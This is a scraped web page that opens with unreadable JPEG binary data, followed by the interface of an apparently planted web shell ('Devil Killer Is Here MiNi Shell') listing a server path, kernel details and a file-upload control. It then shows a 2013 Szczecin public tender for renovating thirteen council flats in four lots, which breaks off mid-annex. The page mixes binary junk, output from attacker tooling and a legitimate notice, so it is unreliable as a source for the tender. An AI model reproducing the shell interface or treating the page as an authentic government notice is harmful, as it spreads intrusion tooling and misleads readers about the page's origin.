JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130507/67505-N-2013.html

<p class="kh_header"><b>Szczecin: Wykonanie remontu trzynastu komunalnych lokali mieszkalnych w Szczecinie w podziale na cztery części</b><br>
<b>Numer ogłoszenia: 67505 - 2013; data zamieszczenia: 07.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Budynków i Lokali  Komunalnych , ul. Mariacka 25, 70-546 Szczecin, woj. zachodniopomorskie, tel. 91 4886333, 91 4886301, faks 91 4893831, 91 4893832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/WWW.ZBiLK.szczecin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu trzynastu komunalnych lokali mieszkalnych w Szczecinie w podziale na cztery części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu trzynastu komunalnych lokali mieszkalnych w budynku przy ul. Nad Odrą 103/2, ul. Nad Odrą 113/11  ul. Strzałowskiej 38/5, ul. Dubois 15/2, ul. Emilii Plater 12/1, ul. Radogoskiej 15/9a,      ul. Zagłoby 28/4, ul. Niemierzyńskiej 14/18, ul. Słowackiego 5/10, ul. Zakopiańskiej 14/10, ul. Mazurskiej 24/8, ul. Mazurskiej 24/31, ul. Kaszubskiej 33/15 w Szczecinie, w podziale na cztery części.

1)Część I zamówienia - remont trzech  lokali mieszkalnych:

a)ul. Nad Odrą 103/2 - remont lokalu we wszystkich branżach: budowlanej -  montaż czujnika czadu, zlikwidowanie grzyba, malowanie ścian i sufitów wraz z robotami towarzyszącymi, sanitarnej -wymiana zlewozmywaka, montaż wodomierza, elektrycznej - częściowa wymiana  instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia użytkowa lokalu  - 41,94 m2
b)ul. Nad Odrą 113/11 - remont lokalu w branżach: budowlanej - malowanie ścian i sufitów wraz z robotami towarzyszącymi, obsadzenie kratki wentylacyjnej, wymiana osprzętu w piecu licowanym kaflami, montaż czujnika czadu,, sanitarnej - próba instalacji gazowej, demontaż termy gazowej, wyregulowanie kuchenki gazowej, montaż wodomierza, wymiana zlewozmywaka, elektrycznej - częściowa wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych, powierzchnia lokalu wynosi - 46,00 m2 
c)ul. Strzałowska 38/5 - remont lokalu we wszystkich branżach: budowlanej - malowanie stolarki okiennej i drzwiowej wraz z robotami towarzyszącymi,  malowanie pomieszczeń wraz z robotami towarzyszącymi, montaż czujnika czadu, wymiana wykładziny PCV w kuchni,  remont pieca kaflowego, sanitarnej - próba instalacji gazowej, montaż wodomierza, wymiana kuchenki gazowej 4-palnikowej z piekarnikiem, wymiana zlewozmywaka, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych, montaż grzejników konwektorowych,
 powierzchnia lokalu wynosi - 40,70 m2

2)Część II zamówienia - remont czterech lokali mieszkalnych:
a)ul. Dubois 15/2 - remont lokalu (po pożarze) we wszystkich branżach: budowlanej - wymiana stolarki drzwiowej, malowanie stolarki okiennej,  malowanie ścian, sufitów wraz z robotami towarzyszącymi, postawienie pieca licowanego kaflami, montaż czujnika czadu, cyklinowanie podłóg, sanitarnej - wymiana zlewu, montaż wodomierza, próba instalacji gazowej, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych
powierzchnia lokalu wynosi - 24,56 m2
b)ul. Emilii Plater 12/1 - remont lokalu we wszystkich branżach: budowlanej - obsadzenie kratki wentylacyjnej, odgrzybienie ścian, przestawienie pieca licowanego kaflami, wymiana wykładziny PCV, montaż nawietrzaka - 3 szt., montaż czujnika czadu, malowanie ścian, sufitów, wraz z robotami towarzyszącymi, sanitarnej - próba instalacji gazowej, wymiana wodomierza, sprawdzenie kuchenki gazowej, wymiana zlewu metalowego, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych, powierzchnia lokalu wynosi - 27,48 m2  
c)ul. Radogoska 15/9a - remont lokalu we wszystkich branżach: budowlanej - wymiana wykładziny PCV, montaż czujnika czadu, wyczyszczenie pieca licowanego kaflami, malowanie ścian, sufitów wraz z robotami towarzyszącymi, sanitarnej - wymiana zlewu blaszanego, montaż wodomierza, sprawdzenie kuchenki gazowej z piekarnikiem, próba instalacji gazowej, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia lokalu wynosi - 32,49 m2  
d)	ul. Zagłoby 28/4 - remont lokalu we wszystkich branżach: budowlanej - montaż kratki wentylacyjnej, częściowa wymiana tynków, malowanie ścian, sufitów,  wraz z robotami towarzyszącymi, sanitarnej - demontaż urządzeń sanitarnych                         z korkowaniem podejść odpływowych, montaż wodomierza, próba instalacji gazowej, elektrycznej - montaż grzejnika elektrycznego, częściowa wymiana osprzętu elektrycznego, pomiar rezystancji izolacji instalacji elektrycznych, powierzchnia lokalu wynosi - 32,50 m2 

3)Część III zamówienia - remont trzech  lokali mieszkalnych:

a)ul. Niemierzyńskiej 14/18 - remont lokalu we wszystkich branżach: budowlanej -   wymiana stolarki okiennej drewnianej na PCV,  malowanie ścian, sufitów, wraz z robotami towarzyszącymi, montaż detektora tlenku węgla, wymiana osprzętu w piecu licowanym kaflami, sanitarnej - montaż wodomierza, wymiana kuchenki gazowej z piekarnikiem, próba instalacji gazowej, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, montaż grzejnika akumulacyjnego pomiar rezystancji izolacji instalacji elektrycznych, powierzchnia lokalu wynosi - 32,89 m2
b)ul. Słowackiego 5/10 - remont lokalu we wszystkich branżach: budowlanej - wymiana stolarki drzwiowej wewnętrznej i drzwi wejściowych, wymiana stolarki okiennej z PCV, malowanie ścian, sufitów wraz z robotami towarzyszącymi, wymiana tynków, sanitarnej - wymiana umywalki, wymiana zlewozmywaka, wymiana kuchenki gazowej 4 palnikowej z piekarnikiem, próba instalacji gazowej, wykonanie centralnego ogrzewania gazowego etażowego z kotłem gazowym dwufunkcyjnym oraz wydzielenie pomieszczenia na łazienkę z pomieszczenia WC., montaż wanny, montaż ustępu z płuczką ustępową typu (kompakt), elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych, powierzchnia lokalu wynosi - 35,65 m2 
c)ul. Zakopiańskiej 14/10 - remont lokalu we wszystkich branżach: budowlanej - obsadzenie kratki wentylacyjnej, wymiana wykładziny PCV w pomieszczeniu kuchni, montaż detektora tlenku węgla, wymiana osprzętu w piecu licowanym kaflami, wymiana stolarki drzwiowej wewnętrznej, malowanie ścian, sufitów wraz z robotami towarzyszącymi, sanitarnej - wymiana zlewu blaszanego, wymiana kuchni gazowej 2 palnikowej bez piekarnika, montaż wodomierza, próba instalacji gazowej, elektrycznej - częściowa wymiana instalacji wraz z  osprzętem, pomiar rezystancji izolacji instalacji elektrycznych, 
                  powierzchnia lokalu wynosi - 36,87 m2

4)	Część IV zamówienia - remont trzech  lokali mieszkalnych:
a)	ul. Mazurskiej 24/18 - remont lokalu we wszystkich branżach: budowlanej - przestawieni pieca licowanego kaflami, montaż nawiewników automatycznych w istniejących oknach, montaż detektora tlenku węgla, malowanie ścian, sufitów wraz z robotami towarzyszącymi, osadzenie kratek wentylacyjnych szt.2, sanitarnej - wymiana miski ustępowej, wymiana sedesu z tworzywa sztucznego, wymiana płuczki ustępowej, montaż wodomierza, elektrycznej - częściowa wymiana osprzętu, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia lokalu wynosi - 40,90 m2 
b)	ul. Mazurska 24/31 - remont lokalu we wszystkich branżach: budowlanej -    przestawienie pieca licowanego kaflami, malowanie ścian, sufitów, wraz                       z robotami towarzyszącymi, malowanie stolarki okiennej i drzwiowej, obsadzenie kratki wentylacyjnej, montaż detektora tlenku węgla, sanitarnej - próba instalacji gazowej, montaż wodomierza, wymiana kuchenki gazowej dwupalnikowej bez piekarnika, wymiana elementów zestawu płuczki ustępowej, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia lokalu wynosi - 24,41 m2
c)ul. Kaszubska 33/15 - remont lokalu we wszystkich branżach: budowlanej -malowanie ścian, sufitów, wraz z robotami towarzyszącymi, wymiana stolarki drzwiowej wewnętrznej, sanitarnej - wymiana kuchenki gazowej 4 palnikowej z piekarnikiem, próba instalacji gazowej, montaż wodomierza, elektrycznej - wymian instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych, powierzchnia lokalu wynosi - 38,60 m2
UWAGA !! Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną część lub na dwie części zamówienia. W przypadku złożenia oferty na dwie części zamówienia - termin wykonania nie może być dłuższy niż 90 dni kalendarzowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium należy wnieść w wysokości: 
1)dla części I (ul. Nad Odrą 103/2, ul. Nad Odrą 113/11, ul. Strzałowska 38/5) zamówienia - 398,00 zł (słownie: trzysta dziewięćdziesiąt osiem złotych),
2)dla części II (ul. Dubois 15/2, ul. Emilii Plater 12/1, Radogoska 15/9a, ul. Zagłoby 28/4) zamówienia - 671,00 zł (słownie: sześćset siedemdziesiąt jeden złotych),
3)dla części III (ul. Niemierzyńska 14/18, ul. Słowackiego 5/10, ul. Zakopiańska 14/10) zamówienia - 1.339,00 zł (słownie: jeden tysiąc trzysta trzydzieści dziewięć złotych),
4)dla części IV (ul. Mazurska 24/8, ul. Mazurska 24/31, ul. Kaszubska 33/15) zamówienia - 425,00 zł (słownie: czterysta dwadzieścia pięć złotych),
w terminie do dnia 22 maja 2013r. do godz. 1000 . Decyduje data wpływu środków do   zamawiającego.
2.Wadium może być wnoszone:
1)w pieniądzu - przelewem na konto ZBiLK w ING Bank Śląski O/Szczecin nr 73 1050 0099 6803 0000 0000 0001
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Dokumenty, o których mowa w pkt 2 należy zdeponować w siedzibie ZBiLK przy 
ul. Mariackiej 25  w pokój nr  9  przed upływem terminu składania ofert.
3.Wadium może być wniesione w jednej lub kilku formach.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu oceny spełniania warunku,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał  należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną najważniejszą robotę budowlaną. Za jedną najważniejszą robotę budowlaną zamawiający uzna, wykonanie remontu jednego lokalu mieszkalnego we wszystkich branżach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu oceny spełniania warunku,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej,
UWAGA:
Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2010 Nr 243 poz. 1623 - tekst jednolity z późniejszymi zmianami) osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu oceny spełniania warunku,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)oferta cenowa zgodnie z Rozdziałem I ust. 3 siwz; 
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I ust. 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III ust. 1 siwz)
3)oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, 
że wykonawca na 2 dni  przed podpisaniem umowy przedłoży kosztorysy szczegółowe dla każdego lokalu mieszkalnego, sporządzone zgodnie z zasadami określonymi w Rozdziale X siwz.
W przypadku składania oferty wspólnej należy złożyć jeden dokument 
5)oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, że wykonawca przed podpisaniem umowy przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż wysokość wynagrodzenia na czas trwania robót budowlanych.
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art.144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza zmiany zawartej umowy w zakresie:
1)terminu wykonania zamówienia w przypadku wystąpienia nieprzewidzianych robót, których realizacja jest niezbędna do prawidłowego wykonania przedmiotu umowy i będzie miała istotny wpływ na przedłużenie terminu zakończenia robót,
2)zmiany w dokumentacji projektowej, których konieczności wprowadzenia nie dało się przewidzieć na etapie podpisania umowy,
3)zmianę osób przewidzianych do realizacji umowy, w szczególnych przypadkach losowych, których wystąpienie uniemożliwi realizację umowy przez te osoby.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbilk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków i Lokali Komunalnych ul. Mariacka 25 70-546 Sczecin pok. nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2013 godzina 10:00, miejsce: Zarząd Budynków i Lokali Komunalnych pok. nr 9 ul. Mariacka 25 70-546 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wykonanie remontu trzech komunalnych lokali mieszkalnych przy ul. Nad Odrą 103/2, ul. Nad Odrą 113/11, ul. Strzałowskiej 38/5 w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)ul. Nad Odrą 103/2 - remont lokalu we wszystkich branżach: budowlanej -  montaż czujnika czadu, zlikwidowanie grzyba, malowanie ścian i sufitów wraz z robotami towarzyszącymi, sanitarnej -wymiana zlewozmywaka, montaż wodomierza, elektrycznej - częściowa wymiana  instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia użytkowa lokalu  - 41,94 m2
b)	ul. Nad Odrą 113/11 - remont lokalu w branżach: budowlanej - malowanie ścian i sufitów wraz z robotami towarzyszącymi, obsadzenie kratki wentylacyjnej, wymiana osprzętu w piecu licowanym kaflami, montaż czujnika czadu,, sanitarnej - próba instalacji gazowej, demontaż termy gazowej, wyregulowanie kuchenki gazowej, montaż wodomierza, wymiana zlewozmywaka, elektrycznej - częściowa wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia lokalu wynosi - 46,00 m2 
